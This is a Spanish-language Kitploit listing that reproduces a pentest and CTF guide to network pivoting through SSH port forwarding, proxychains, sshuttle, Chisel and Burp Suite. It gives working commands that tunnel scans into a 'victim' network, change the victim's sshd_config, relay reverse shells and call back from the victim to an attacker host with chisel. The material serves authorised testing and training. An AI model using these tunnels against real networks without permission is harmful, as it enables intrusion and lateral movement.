Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
pentest-pivoting — Una guía compacta sobre pivoting de red para pruebas de penetración / desafíos CTF. | Kitploit
Herramientas/GitHubGitHub/t3l3machus/pentest-pivoting
Proxies Web e InterceptaciónMovimiento LateralSeguridad de RedesCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingRecursos Curados
GitHubt3l3machus/pentest-pivoting

pentest-pivoting

Una guía compacta sobre pivoting de red para pruebas de penetración / desafíos CTF.

Ver Repositorio
228441hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Guía de Pivoting

Tabla de contenido

  1. Notas importantes
  2. Reenvío dinámico de puertos SSH
  3. Reenvío remoto de puertos SSH
  4. Reenvío local de puertos SSH
  5. Doble Pivoting
  6. sshuttle
  7. Chisel
  8. Usando Burpsuite como proxy
  9. Recursos útiles

Notas importantes

  • No utilices solicitudes de eco ICMP (ping) para probar proxies SOCKS.
    SOCKS es un protocolo de Internet que intercambia paquetes de red entre un cliente y un servidor a través de un servidor proxy. En la práctica, un servidor SOCKS proxifica conexiones TCP a una dirección IP arbitraria y proporciona un medio para reenviar paquetes UDP. Debes probarlo usando un protocolo basado en TCP (p. ej., intenta hacer SSH o enviar una petición HTTP GET a un host a través del túnel de pivoting).

  • NMAP debe usarse con escaneo de conexión TCP (-sT) y sin ping (-Pn)
    Esto también aplica a los escaneos de versión (-sV) y de scripts (-sC). Deben usarse en combinación con -sT y -Pn.
    Ejemplos:

    root@kitploit:~
    proxychains nmap -sT -Pn -p- x.x.x.x
    proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 x.x.x.x
    

    Consejo: Puedes subir naabu a la máquina víctima y escanear como un jefe.

  • Usar scripts y binarios con proxychains
    Un consejo para usar proxychains es asegurarse de que, si estás ejecutando un programa interpretado (como un script de Python), es buena idea referenciar explícitamente el binario de Python antes que el script, incluso si el script comienza con un shebang, p. ej.:

    root@kitploit:~
    proxychains4 [-q -f proxychains.conf] python python_script.py
    

    Sin esta referencia específica al intérprete del script, a veces el tráfico generado por el script no se enrutará a través del proxy como pretendías, y la conexión de red fallará. Fuente del consejo

  • Descomenta la línea "quite mode" en /etc/proxychains.conf para evitar un stdout que puede resultar frustrante a veces.
    Esto es solo una sugerencia.

Reenvío dinámico de puertos SSH

Te permite crear un socket en la máquina local (cliente ssh), que actúa como servidor proxy SOCKS. Cuando un cliente se conecta a este puerto, la conexión se reenvía a la máquina remota (servidor ssh), y luego se reenvía a un puerto dinámico en la máquina de destino.

Cómo configurarlo:

  1. Edita /etc/proxychains.conf y haz lo siguiente:

    • Descomenta Dynamic chain.
    • Comenta Strict chain y Random chain.
    • Añade la línea socks4 127.0.0.1 9050 al final del documento (lista de proxies), guarda y cierra el archivo. *Puedes, por supuesto, usar un puerto diferente.
  2. Configura el reenvío dinámico de puertos SSH:

root@kitploit:~
ssh -D 127.0.0.1:9050 user@victim-IP

Ejemplos de uso:
Siendo x.x.x.x la dirección IP de un host que pertenece a la red tunelizada:

root@kitploit:~
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains smbmap -H x.x.x.x
proxychains ssh [email protected]

Para usar Firefox a través del túnel:

root@kitploit:~
proxychains firefox

Reenvío remoto de puertos SSH

Si estás buscando cómo conseguir una reverse shell a través de un túnel de pivoting, esto es lo que necesitas. Te permite reenviar un puerto de la máquina remota (víctima) a un puerto de la máquina local (atacante).

Cómo configurarlo:

  1. Haz SSH a la máquina víctima.

  2. Edita /etc/ssh/sshd_config y haz lo siguiente:

    • Descomenta GatewayPorts no y cámbialo a Yes. Guarda y cierra el archivo.

    *Esto es muy importante y muchas guías en la web no lo mencionan. Si no lo haces, solo podrás configurar el túnel en 127.0.0.1 en lugar de 0.0.0.0, lo que terminará no reenviando tráfico cuando se origine desde cualquier host excepto localhost.

    • Reinicia el servicio SSH para que los cambios surtan efecto. sudo service ssh restart
    • Sal y vuelve a tu máquina.
  3. Configura el reenvío remoto de puertos SSH:
    Esencialmente, después de configurarlo como se mencionó, el comando es tan simple como esto:

root@kitploit:~
ssh -R 2222:*:2222 user@victim-IP

Para probar si funciona, puedes hacer lo siguiente:
Configura un listener (p. ej. netcat) en tu máquina atacante (en el puerto que configuraste para el reenvío remoto, en este ejemplo 2222) y haz una petición desde la máquina víctima hacia sí misma (localhost). En este ejemplo, sería nc 127.0.0.1 2222. Si tu máquina atacante recibe la conexión, significa que a) funciona y b) cada conexión desde los hosts en pivoting hacia victimip:2222 será reenviada a la máquina atacante.

Puedes configurar varios puertos así:

root@kitploit:~
ssh -R 2222:*:2222 -R 3333:*:3333 user@victim-IP

Precaución: Las peticiones de hosts externos (red en pivoting) deben dirigirse a la IP de la víctima para poder reenviarse de vuelta a la máquina atacante.

*También puedes implementar el reenvío remoto de puertos conectándote por SSH desde la víctima a la máquina del atacante.

Reenvío local de puertos SSH

El reenvío local de puertos te permite reenviar un puerto de la máquina local (atacante) a un puerto de la máquina remota (víctima). Es particularmente útil para escanear puertos locales en la víctima.

Uso:

root@kitploit:~
ssh user@victim-IP -L 8888:127.0.0.1:8086

Ahora puedes usar, por ejemplo, nmap para escanear el puerto 8086 en la máquina víctima así:

root@kitploit:~
nmap -Pn -n -p8888 -sV 127.0.0.1

Doble Pivoting

Un ejemplo de cómo implementar doble pivoting con reenvío dinámico de puertos SSH y Proxychains.

Concepto:
Supongamos que tenemos las siguientes 4 máquinas.

IPRol
10.10.10.10Atacante
10.10.10.11Jumphost1
172.16.1.12Jumphost2
172.16.2.13Jumphost3

El atacante puede alcanzar Jumphost1.
Jumphost1 puede alcanzar Jumphost2.
Jumphost2 puede alcanzar Jumphost3.

  1. Para alcanzar Jumphost2, aplica las instrucciones de reenvío dinámico de puertos SSH mencionadas antes, contra Jumphost1.
  2. Para alcanzar Jumphost3, edita /etc/proxychains.conf y añade otra entrada de proxy al final del documento. El final de tu proxychains.conf ahora se verá así:
root@kitploit:~
...
socks4 127.0.0.1 9050
socks4 127.0.0.1 9999
  1. Haz SSH a Jumphost1 y configura otro reenvío dinámico de puertos contra Jumphost2 (el puerto local que elijas debe ser el mismo que el configurado para tu segunda entrada de proxy en proxychains.conf):
root@kitploit:~
ssh -D 127.0.0.1:9999 user@Jumphost2

Ahora deberías poder alcanzar Jumphost3.

sshuttle

sshuttle te permite crear una conexión VPN desde tu máquina a cualquier servidor remoto a través de ssh, siempre que ese servidor tenga Python 2.3 o superior. Para que funcione, debes tener acceso root en la máquina local, pero puedes tener una cuenta normal en el servidor. Es válido ejecutar sshuttle más de una vez simultáneamente en una misma máquina cliente, conectándose a un servidor diferente cada vez, por lo que puedes estar en más de una VPN a la vez. Consulta el repositorio de GitHub de sshuttle.

Uso:
Suponiendo que queremos pivotar hacia 172.16.2.0/16:

root@kitploit:~
sshuttle -vvr root@victim 172.16.2.0/16

Si quieres usar una clave ssh:

root@kitploit:~
sshuttle -vvr root@victim --ssh-cmd 'ssh -i ~/.ssh/id_rsa' 172.16.2.0/16

Chisel

Chisel es un túnel TCP/UDP rápido, transportado sobre HTTP, asegurado mediante SSH. Un único ejecutable que incluye tanto cliente como servidor. Escrito en Go (golang). Es increíblemente alucinante y útil.

Instalación:
Puedes instalar chisel fácilmente en Kali:

root@kitploit:~
apt install chisel

Para usarlo, también necesitas subir el binario de chisel a la víctima. Puedes descargar versiones precompiladas aquí.

Ejemplo de reenvío de puerto local
En tu máquina atacante:

root@kitploit:~
chisel server -p 8000 --reverse

En la máquina víctima:

root@kitploit:~
./chisel_1.7.7_linux_amd64 client attacker-ip:8000 R:1234:127.0.0.1:8443

Esto va a reenviar el tráfico desde el puerto 1234 de la máquina atacante al puerto 8443 de la máquina víctima.

Usando Burpsuite como proxy

Burpsuite admite la posibilidad de configurar proxies, una característica increíblemente útil y potente.

Cómo configurarlo:
Abre Burpsuite y haz lo siguiente:

  • Ve a Proxy/Options y pulsa add en la sección Proxy Listeners.
  • Configura un puerto de enlace e interfaz.
  • En la segunda pestaña, establece el host y el puerto al que quieres redirigir el tráfico.

En combinación con la configuración de un reenvío dinámico de puertos SSH o de sshuttle, ahora puedes usar Burpsuite para pivotar tráfico hacia los hosts deseados enviando tráfico a tu puerto de enlace localhost. Un ejemplo útil con gobuster dir en fuerza bruta de directorios a través del túnel (asumiendo que configuraste el puerto 2222 como puerto de redirección):

root@kitploit:~
gobuster dir -u http://127.0.0.1:2222 -t 40 -w /some/dirlist.txt

Recursos útiles

  • https://artkond.com/2017/03/23/pivoting-guide/
  • https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
  • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663
Descargar herramienta